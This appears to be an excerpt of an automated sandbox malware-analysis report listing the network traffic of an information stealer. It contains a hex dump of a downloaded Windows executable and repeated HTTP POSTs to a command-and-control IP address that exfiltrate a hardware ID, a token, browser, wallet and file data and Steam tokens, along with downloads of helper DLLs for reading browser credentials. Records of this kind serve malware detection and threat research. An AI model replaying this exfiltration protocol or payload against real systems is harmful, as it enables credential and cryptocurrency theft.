00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 23:32:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECGHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 32 37 45 45 43 34 32 44 33 32 30 38 39 32 35 37 30 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 2d 2d 0d 0a Data Ascii: ------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="hwid"BA827EEC42D32089257003------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="build"default10------KFIIJJJDGCBAAKFIIECG--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="message"browsers------HJKJKKKJJJKJKFHJJJJE--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHDHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="message"plugins------AKKEGHJDHDAFHIDHCFHD--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJEHost: 185.172.128.76Content-Length: 8359Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAFHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGHHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHDHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file"------AKKEGHJDHDAFHIDHCFHD--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGIHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 2d 2d 0d 0a Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJJDHIDBGHIDHIDAFBHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKFHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"wallets------HIJEGDBGDBFIJKECBAKF--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJEHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="message"files------EGIDBFBFHJDGCAKEGHJE--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJEHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJECFIECBFIDGDAKFHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHCFBAKFBGDGDHJKJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAKHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="file"------FHIECBAFBFHIJKFIJDAK--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDHost: 185.172.128.76Content-Length: 112219Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJDHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 